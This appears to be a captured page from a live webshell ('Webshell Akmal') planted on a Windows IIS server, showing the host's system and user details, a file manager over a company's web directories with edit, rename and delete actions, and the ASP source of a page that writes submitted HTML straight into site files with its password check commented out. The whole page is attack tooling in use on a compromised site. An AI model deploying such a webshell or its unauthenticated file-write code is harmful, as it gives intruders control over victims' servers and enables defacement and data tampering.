Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<html> <% 'if session(Webpassed)<>"passed" then Response.End %> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> </head> <%set fs=Server.CreateObject("Scripting.FileSystemObject") %> <body> <% xxx=request.Cookies("ItemID") If request.form ("BB")="Submit" then set f=fs.CreateTextFile(Server.MapPath(xxx &"/0000mainpage.htm"),true) DD=request.form("S28") if len(DD)=0 then DD=" " f.write(DD) f.close :set f=nothing : end if If (fs.FileExists(Server.MapPath(xxx &"/0000mainpage.htm")))=true then i=0: html="" Set f=fs.OpenTextFile(Server.MapPath(xxx &"/0000mainpage.htm"), 1) do while f.AtEndOfStream = false WW=trim(f.ReadLine) if len(WW)<>0 then WW22 =ww22& WW &chr(13)&chr(10) html=html&ww end if loop f.Close:Set f=Nothing: end if %> <table border="1" width="796" height="1" style="border-collapse: collapse" bordercolor="#0000FF"> <tr> <td height="1" width="796" bgcolor="#666666" bordercolor="#0000FF"> <font color="#FF0000"><span style="font-size: 9pt"><%=inf1%></span></font></b><form method="post" action=""> <p align="center"> <textarea rows="5" name="S28" cols="122" style="font-size: 11px; font-family: Verdana"><%=ww22%></textarea><br> <font size="2" face="Verdana"><font color="#FFFFFF">HTML Input:</font> </font> <input type="submit" value="Submit" name="BB"> </p> </form> <%'------------------------------%> <table border="0" width="796" height="1" valign=top style="border-collapse: collapse" bordercolor="#CCFFFF" bgcolor="#FFFFFF"> <tr> <td height="1" width="796"valign=top ><%=html%></td> </tr> </table> </td> </tr> </table> <%Set fs=Nothing%> </body> </html>